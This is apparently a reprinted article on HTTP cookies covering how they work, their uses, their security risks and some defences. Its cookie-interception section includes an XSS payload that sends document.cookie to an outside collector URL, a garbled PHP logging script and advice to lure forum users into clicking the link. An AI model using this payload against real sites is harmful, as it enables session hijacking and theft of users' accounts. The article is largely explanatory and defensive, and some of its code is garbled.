A Free Trial That Lets You Build Big!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
In view of this, the system studies the technical characteristics of the cookie and its security issues, the research to prevent cookies from disclosing user privacy information measures, not only to ensure the security of personal information, but also more secure use of cookie technology to serve Internet applications.
0x01 Cookie Technical Analysis
1.1 Cookie definition and its functions
As defined in the official Netscape document, a cookie is a way for a server or script to maintain information on a client computer under the HTTP protocol. In layman's terms, a cookie is a technique that allows Web Web servers to store small amounts of data on a client's hard disk or in memory, or to read data from a client's hard disk. A cookie file is a small text file stored on a browser client computer that is created by a Web server's CGI script when browsing a Web site in the format: User name @ web address [digital].txt.
The cookie file records information about the user, such as identification number ID, password, page visited, time spent, how the user shopped on the Web site, or how many times the user visited the site, and when the user links the Web server again, the browser reads the cookie information and passes it on to the Web site.
Cookie file information fragments are stored as "name/value" pairs (name-vaiuepairs), and a "name/value" Pair is just a named piece of data. For example, if you visit the www.goto.com Web site, the site may generate a cookie file on the client computer that contains the following: userida9a3bece0563982dwww.goto.com/. GoTo.com a single "name/value" pair on the computer, where "name" is the UserID and "value" is a9a3bece0563982d.
The location of the cookie file is closely related to the operating system and browser, which are called Cookie files on Windows machines and are called Magiccookie files in the Macintosh machine. For Windows and Internet Explorer, the cookie file is stored in the following location:
Win9x operating System: C:\windows\cookies;winme operating system: C:\Windows\profiies\ user name \cookies;win2k operating system: C:\Windows\Cookies ; WinXP operating system: C:\DocumentsandSet-tings\ user name \cookies. Win7 above operating system: C:\Users\ user name \appdata\roaming\microsoft\windows\cookies
The primary function of a cookie is to record the user's personal information, and its most fundamental purpose is to help the Web site save information about the visitor. More generally, a cookie is a way to maintain Web application continuity (that is, execution state management).
The HTTP protocol is a stateless, non-connected protocol that cannot maintain continuous state information for a session on the server. With the development of WWW, the stateless nature of HTTP can not meet the needs of some applications, which brings inconvenience to the operation of Web server and client. In this context, the State management mechanism of HTTP is proposed ——— cookie mechanism, which is a supplement to the HTTP protocol to maintain the continuous state of the server and the client.
1.2 Cookie Basic Working principle
Cookies use Httpheader to pass data. The cookie mechanism defines two types of headers: the Set-cookie header and the cookie header. The Set-cookie header is contained in the response header (Responseheader) of the Web server, and the cookie header is contained in the browser client request header (Reguestheader).
The operation of the cookie, the specific analysis is as follows
Operating process diagram of cookies
(1) The client type the URL of the Web server in the address bar of the browser, and the browser sends a request to read the webpage.
(2) When the server receives the request, it generates a Set-cookie header, which is placed in the HTTP message to return the client together and initiates a session.
(3) After the client receives the answer, to continue the session, the contents of the Set-cook-ie are taken out and a Cookie.txt file is stored in the client computer.
(4) When the client makes a request to the server again, the browser first searches the computer for the Cookie.txt file of the Web site. If found, the cookie header is generated based on this Cookie.txt, which is sent to the server in the HTTP request message.
(5) The server receives a request containing a cookie header, retrieves information about the user in its cookie, and generates a page response from a client to be passed to the client. Every Web page request of a browser can pass an existing cookie file, for example, the browser's open or refresh page operation.
0x02 Cookie Application
(1) Implement user authentication in the Web
One of the big drawbacks of the HTTP protocol is that it does not make a user's identity, which is a great inconvenience to programmers, and cookies compensate for this flaw. Most sites in the user identity authentication using a cookie mechanism, so that the user after the first authentication, no need to enter their user account number, password password, etc., this can save the user login cumbersome.
(2) Customizing the personalized Space
Cookie technology facilitates the Web site to customize information for different users, to provide users with a personalized, more user-friendly browsing environment, and to more accurately collect visitor information. For example, to provide users with the right to change the content, layout and color of the Web page, allow users to enter their own information, and then through the information on the site to modify some parameters to customize the appearance of the Web page.
In addition, because of the cost, bandwidth constraints and other reasons, users do not want to visit a site to browse all the content of the Web. Using cookie technology to set columns according to personal preferences, dynamically generate the content users need, so as to cater to different levels of user interest, reduce the number of user project selection, more reasonable use of the Web server transmission bandwidth. (3) Website Access statistics
The use of proxies, caches, and so on, makes it possible to help the site accurately count the number of visitors by creating a unique ID for each visitor. Using cookies, the site can do the following: Determine how many people have visited, how many of the visitors are new, how many are old, and how often a user visits a website.
The basic approach is that, with the help of a background database, when a user first accesses the site, the site establishes a new ID in the database and transmits the ID to the user via a cookie. When the user visits again, the website will add 1 to the counter of the user ID, get the user's visit number or judge whether the user is a new user or an old user.
The following design a program that uses the cookie count, written in ASP, which has the ability to count the user's access to the page:
<%@LANGUAGE=Jscript%><%varcount= "" ;< Span class= "PLN" > count=reguest. Cookies "CountNumber" count = (parseint (count,< Span class= "PLN" >l0) +l). tostringresponse. Cookies ( "CountNumber" count ;%>
(4) Maintenance of online e-commerce customer information
Online ordering business uses cookie technology to record items that users want to buy. The user stores the item in the "Shopping cart" and the site is recorded in the user's ID record in the database. When a user "pays", the site retrieves all of the user's choices in the database by ID and knows the items in the "Shopping cart". Cookies simplify the operation of ordering, making online shopping closer to real life.
(5) Recording site tracks
When you visit the same Web site again, the cookie has an attribute that is read back. This feature is used to implement many of the design features, such as displaying the number of times a user visits the page, showing the user's last access time, recording the user's previous selections on this page, and so on, which eliminates the need to study complex CGI programming.
0X03 security issues with cookies
Cookies are designed to bring convenience to users, add value to the website, and generally do not pose a serious security threat. A cookie file cannot be executed as code, and it does not transmit a virus, it is proprietary to the user and can only be read by the server that created it. In addition, browsers generally allow only 300 cookies, each with a maximum of 20 cookies, each cookie size limit is 4KB, so the cookie does not fill the hard disk, and will not be used as a "denial of service" attack means.
However, as a substitute for the user's identity, the security of the cookie sometimes determines the security of the whole system, and the security of the cookie cannot be neglected.
(1) Cookie spoofing cookie records information such as the user's account ID, password, and is usually transmitted online using the MD5 method. After the encrypted processing of information even by some people on the network to intercept some ulterior motives can not understand. However, the problem now is that the person intercepting the cookie does not need to know the meaning of these strings, as long as the cookie is submitted to the server, and can be authenticated, it can impersonate the victim's identity to the site, this behavior is called Cookie spoofing.
The illegal user obtains the corresponding encryption key through the cookie deception, thus accesses the legitimate user's personalized information, including the user's e-mail and even the account information, has caused the serious harm to the personal information.
(2) Cookie interception
Cookies are transmitted in plain text between the browser and the server, and are easily intercepted and exploited by others illegally. Any person who can intercept web traffic can read the cookie.
If a cookie is intercepted by an illegal user and then replayed within its validity period, the illegal user will enjoy the rights of the legitimate user. For example, for online reading, illegal users can enjoy reading e-magazines online without paying a fee.
The means of interception of cookies are as follows.
(1) Interception of cookies by means of programming. The following analysis of its methods, the method is completed in two steps. Step One: Locate the website where you want to collect cookies, analyze them, and construct the URLs. First open the site to collect cookies, here is the assumption is http://www.XXX.net, login website input user name "<Al>" (without quotation marks), analysis of the packet, get the following code:
Http://www.XXX.net/tXl/login/login.pl? Username=<Al>&passwd=&ok. x=28&ok.y=6;
Replace "<Al>" with:
"<script>alert (document.cookie) </script>" Retry, if execution succeeds, start constructing URL:
Http://www.XXX.net/tXl/login/login.pl? Username=<script>window. Open ("http://www.cbifamily.org/cbi.php? "%2bdocument.cookie)</script>&passwd=&ok. x=28&ok.y=6.
Where http://www.cbifamily.org/cbi.php is a script on a host that the user can control. It is important to note that "%2b" is the URL encoding for the symbol "+" because "+" is treated as a space. The URL can be posted in a forum to entice others to click.
Step two: Compile a PHP script that collects cookies and place them on a Web site that the user can control, and then execute the PHP code when an unsuspecting person clicks on the constructed URL. The specific contents of the script are as follows:
<?PHP $info=Getenv（"Ouery_string"）; if ( $info $fp =fopen ( "Info.tXt" , "a" ); ( $fp ,! Info. " \ n " $fp } header (?>
By putting this code on the Web, you can collect everyone's cookies. If a forum allows HTML code or allows the use of flash tags, you can use these techniques to collect cookies into the forum, then give the post an appealing theme, write interesting content, and quickly collect a large number of cookies. In the forum, many people's passwords are stolen by this method.
(2) Use flash code hidden trouble to intercept cookies. There is a Geturl () function in Flash. Flash can use this function to automatically open the specified Web page, which may lead the user to a Web site that contains malicious code. For example, when a user appreciates a flash animation on a computer, the code in the animation frame may have been quietly connected to the Internet and opened a tiny page with special code that collects cookies and can do other harmful things. The site cannot suppress this as a flash, as this is the internal function of the Flash file.
(3) Cookie leaks network privacy
0X04 security measures to protect against cookie leaks
How can cookies be safely applied in the face of cookie security issues?
(1) Strengthen the awareness of safety precautions
Therefore, only some unimportant data is stored in the cookie, such as user preferences or other information that has no significant impact on the application. If you do need to save some sensitive information in Cook-ie, encrypt it to prevent others from stealing it. You can set the properties of a cookie so that it can only be transferred on a connection that uses Secure Sockets Layer (SSL). SSL does not prevent cookies stored on the user's computer from being read or manipulated by others, but prevents the cookie from being intercepted by others while in transit.
(2) Configuring a secure browser
(3) Installing the cookie management tool
(4) Delete the in-memory cookies
The cookie information is not stored as a file on the hard disk, and some information is kept in memory. This type of cookie is usually generated by the system automatically in memory when the user accesses certain special websites. Once a visitor leaves the site, the system automatically removes the cookie from memory. To do this, you need to use Registry Editor to modify the system settings, run Regedit and find the following key values:
Hkey_local_machine\software\microsoft\windows\cur-rentversion\internetsettings\cache\speciaipaths\cookies, This is the key value of the cookie in memory and the key value is deleted. Right-click Cook-ies, and then click the Delete command on the shortcut menu to confirm the deletion.
(5) Using AAS technology
In 2002, the United States Ingriannetworks Company published a platform "activeappii-cationsecurity (AAS)" That could protect a Web site from "cookiepoisoning (cookie Tampering)" attacks. The AAS platform encrypts important information inside the cookie and attaches an electronic signature. Each time the Web server communicates with the client, it uses an electronic signature to confirm the contents of the cookie. If a malicious user deletes an electronic signature or changes the content of the message, the electronic signature and the content of the cookie can no longer be matched. At this point, AAS blocks this cookie and refuses to return information to the Web site. In addition, the platform encrypts the cookie content by 3DES, and the decryption requires a password to securely store the cookie in this way. The communication between the WWW server and the client also takes advantage of the SSL connection mode to ensure the security of the communication route. Through the comprehensive use of electronic signature, encryption, SSL connection and other technologies to form a strong security scheme, can eliminate the two aspects of communication routing and data storage vulnerabilities, to eliminate the alteration of cookies.
0x05 Concluding remarks
A cookie is a small amount of information sent by a Web server that is stored in a client system for future queries. The primary purpose of a cookie is to store information, primarily for the purpose of storing the user's logo and password, and to store the user's preferences for all possible settings. From a programmatic point of view, cookies can be used to solve state management problems.
In fact, if information is not associated with personal information, the cookie is relatively harmless. However, cookies can be used to track users, there are security issues such as cookie spoofing, disclosure of privacy, and can pose a threat to the information security of network users.
Strengthen awareness of prevention, understand the inherent security weaknesses of cookies, configure secure browsers, use cookie management tools, encrypt and transfer cookie data using technologies such as electronic signatures, encryption, and SSL connections to effectively prevent cookies from disclosing user privacy, Protect personal information so that cookies can serve Web applications more securely.
Although the cookie technology is controversial, it will not die out, it needs to study better security technology to its perfection and development. Cookie technology will have greater space for survival and development in the future.
"Reprint" Talk about cookies
Start building with 50+ products and up to 12 months usage for Elastic Compute Service